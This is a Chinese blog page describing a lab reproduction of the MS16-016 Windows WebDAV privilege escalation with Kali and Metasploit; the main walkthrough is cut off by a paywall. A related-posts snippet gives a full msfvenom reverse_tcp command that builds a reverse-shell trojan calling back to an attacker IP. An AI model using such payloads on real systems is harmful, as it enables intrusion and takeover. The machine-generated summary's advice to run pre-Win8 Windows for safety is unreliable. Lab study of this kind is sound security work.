MS16-016漏洞复现

已于 2022-06-01 19:02:48 修改
阅读量1.8k 收藏 7
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全 web安全 linux
于 2022-06-01 19:01:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45440239/article/details/125088410
版权
本文详细介绍了MS16-016漏洞,即WebDAV客户端验证输入不当的安全问题。通过复现过程,包括运行环境设定、木马文件生成、msf框架使用、进程提权等步骤,展示了如何利用此漏洞控制受影响的系统。提醒读者,该漏洞已在2016年2月9日发布补丁,建议使用Win8版本以下的Windows系统以降低风险。
摘要由CSDN通过智能技术生成

MS16-016漏洞复现

Ms16-016(分布式创作和版本管理(WebDAV)客户端验证输入不当)

文章目录

前言

漏洞原理:由于Windows中的webDAV为正确处理webDAV客户端发送的信息导致的。若要利用此漏洞,攻击者首先必须登录系统。然后攻击者可以运行一个为此漏洞经特殊设计的应用程序,从而控制受影响的系统。

一、运行环境

运行环境:win7 x86/kali 2019
攻击机ip(kali):192.168.21.136
靶机ip(win7 x86):192.168.21.137

二、使用步骤

1.生成木马文件

使用msfvenom命令生成木马文件,将生成的木马文件复制到靶机中
在这里插入图片描述

2.开启msf框架

使用exploit/multi/handler模块开启监听模式(设置端口号,与生成木马的端口号一致),运行靶机中的木马文件,获得session号

最低0.47元/天 解锁文章
初 一
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ms16-016提权
qq_54713392的博客
05-08 1204
ms16-016提权 简介:靶机需32位windows系统 攻击机:kali IP地址为:192.168.32.132 目标机:windows32 IP地址:192.168.32.135 先ping两台主机看是否通 步骤: 1)生成木马,设置本地ip地址192.168.32.132和端口号4444 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.32.132 LPORT=4444 -f exe > /root/test.exe 2)
一次历史漏洞分析与复现的全部过程
HBohan的博客
02-26 2500
环境需求 系统:Windows10 中间件:https://dlcdn.apache.org/tomcat/tomcat-9/v9.0.58/bin/apache-tomcat-9.0.58-windows-x64.zip 数据库:用phpstudy携带的5.7.26版本即可 jspxcms安装包(部署到Tomcat用来复现):https://www.ujcms.com/uploads/jspxcms-9.0.0-release.zip jspxcms源码包(部署到IDEA进行分析):https://w
MS16-016 提权EXP
angaoux03775的博客
02-28 380
测试环境win732位未打任何补丁 1、使用netuser指令测试得到结果没有权限新建用户 2.查看系统用户 3、复制EXP到win7下使用命令打开添加新用户再查看用户列表 转载于:https://www.cnblogs.com/sevck/p/5225643.html...
MS16-032 漏洞复现
EC_Carrot的博客
04-07 677
漏洞背景 Secondary Logon Service是其中的一个辅助登录服务。 Microsoft Windows的辅助登录服务存在特权提升漏洞,该漏洞源于程序没有正确管理内存中的请求句柄。本地攻击者可利用该漏洞以管理员身份运行任意代码。 微软在2016年3月8日已经更新了该漏洞的补丁文件KB3139914 影响范围 Microsoft Windows Vista SP2 Windows Server 2008 SP2和R2 SP1 Windows 7 SP1 Windows 8.1 Windows
ms16-075提权复现
qq_42307546的博客
03-24 598
.CVE-2016-3225(MS16-075)提权 1.漏洞描述 当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特权提升漏洞。成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。 若要利用此漏洞,攻击者首先必须登录系统。然后,攻击者可以运行一个为利用此漏洞而经特殊设计的 应用程序,从而控制受影响的系统。此更新通过更正 Windows 服务器消息块 (SMB) 服务器处理凭据转 发请求的方式来修复此漏洞。 注:烂土豆(Rotten Po
[提权]MS16-016提权EXP
weixin_30621711的博客
01-12 1421
MS16-016提权EXP[K8]Tested On Win7 x86Usage: ms16-016_win7.exe "whoami"by K8拉登哥哥 20160216下载:http://pan.baidu.com/s/1c1r45c0 转载于:https://www.cnblogs.com/k8gege/p/10261356.html
〖教程〗Ladon提权MS16-135参数版(WIN7-2016)
K8哥哥
08-08 1256
漏洞名称 Win32k 特权提升漏洞(MS16-135)(CVE-2016-7255) 漏洞等级 高危 漏洞类型 本地提权 漏洞描述 如果 Windows 内核模式驱动程序无法正确处理内存中对象,则会存在多个特权提升漏洞。成功利用此漏洞的攻击者可以在内核模式下运行任意代码。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。 攻击者必须先登录系统,然后才能利用这些漏洞。然后攻击者可以运行一个为利用这些漏洞而经特殊设计的应用程序,从而控制受影响的系统。该更新通过更正 Windows
计算机丢失sspicli,MS16-047:SAM 和 LSAD 远程协议安全更新程序说明:2016 年 4 月 12 日...
weixin_34902502的博客
07-24 1512
此软件更新程序的英语(美国)版本将安装具有下表所列属性的文件。Windows Vista 和 Windows Server 2008 文件信息注意通过检查下表中显示的文件版本号,可以识别适用于特定产品、里程碑(RTM、SPn)和服务分支(LDR、GDR)的文件:版本产品里程碑服务分支6.0.600 2.19xxxWindows Vista 或 Windows Server 2008SP2GDR6....
kali 使用 msf通过sm17_010漏洞拿到Windows shell
kk的博客
07-30 454
3、找到msf的工具目录,进入smb_ms17_101漏洞利用模块,使用search ms17_010查看可用模块、使用show optionsc查看可支持命令与参数。1、nessus扫描目标系统的IP拿到系统漏洞信息(存在ms11_030、ms17_010、ms16_047漏洞),本教程以ms17_010为例讲解。serach vce:VCE-2017-8464 type:exploit # 查找漏洞VCE-2017-8464的利用方法与模块。modules:存储metasploit的模块文件。
漏洞CNNVD-201805-248的复现与提权
weixin_43434933的博客
06-23 1097
实验原理介绍(图文) 本次实验实现漏洞CNNVD-201805-248的复现与入侵,以及后续的提权管理员和留后门操作。 漏洞基本信息: 漏洞名称:Microsoft Windows VBScript 引擎安全漏洞 CNNVD编号:CNNVD-201805-248 CVE编号:CVE-2018-8174 危害等级:高危 漏洞类型:缓冲区错误 威胁类型:远程 发布时间:2018-05-10 漏洞简...
MS16_016 漏洞利用与安全加固_exploit windows local ms16_016_webdav
最新发布
2301_78398209的博客
04-11 846
MS16_016 漏洞产生的原因是由于 Windows 中的 WebDAV(分布式创作和版本管理)未正确处理客户端发送的信息,攻击者可以运行经过特殊设计的应用程序,从而提升权限。
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 802
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
全版本Windows RCE漏洞复现CVE-2023-36025
weixin_57514792的博客
01-10 1576
漏洞复现
通过msf复现漏洞ms16-016
NatusVincere
03-20 85
攻击者可以利用特意构造的应用程序或网页来绕过这些权限控制,使得攻击者可以在系统内核态执行恶意代码,并且获取系统权限。通过利用这个漏洞,攻击者可以执行未经授权的代码,获取系统敏感信息,或者潜在地导致拒绝服务情况。修复这个漏洞需要微软对Windows内核和相关的权限验证机制进行修复,以确保系统能够正确地限制和验证用户模式与内核模式之间的通信,从而防止类似的安全功能绕过问题。这个漏洞主要由两个方面组成:一是Windows内核对于用户模式与内核模式的通信机制出现了缺陷,使得攻击者可以进行越权操作;
MS16_016 漏洞利用与安全加固
theRavensea
03-18 855
MS16_016 漏洞产生的原因是由于 Windows 中的 WebDAV(分布式创作和版本管理)未正确处理客户端发送的信息,攻击者可以运行经过特殊设计的应用程序,从而提升权限。
烂土豆 (ms16-075) 提权方法
越努力 越自由
03-11 9999
所谓的烂土豆提权就是俗称的MS16-075,其是一个本地提权,是针对本地用户的,不能用于域用户。可以将Windows工作站上的特权从最低级别提升到“ NT AUTHORITY \ SYSTEM” – Windows计算机上可用的最高特权级别。
内网渗透中最常见的十种漏洞分析总结
systemino的博客
08-16 5190
以下信息是根据2020年和2019年为全球各种中型组织和企业完成的60多个渗透测试报告汇总而来的,在跳转到列表之前,让我们简要介绍一下全面的测试方法。 0x01 测试方法 目的是使用白盒(灰盒)方法在现场进行内部基础设施渗透测试。 这意味着对用于测试的工具没有任何限制,并且范围信息也预先共享。 唯一的黑盒部分是,一开始并未提供网络访问权限。 因此,在对网络访问控制进行初步评估(NAC旁路,WiFi评估等)之后,通常会将测试者列入网络白名单,以便执行实际测试而不会在网络级别受到阻碍。 然后从网络上
linux161端口漏洞,最近非常火的宝塔漏洞 888端口的入侵
weixin_39979080的博客
05-03 485
宝塔介绍“宝塔”这个网站程序,做过网站的朋友应该不会感到陌生。宝塔 为搭建在Linux主机上的网站,提供了一个强大的后台管理系统。让网站管理人员能更方便的,管理自己的网站服务器,并且可以通过手机随时随地,监控网站的一个流量波动。bt_1.png骇客篡改数据库然而就是这样一个强大服务器管理系统,前段时间就因为一个漏洞;上了百度的热搜榜。漏洞爆出的当天,不少网站都遭到了 骇客的光顾。数据库的数据被 篡...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值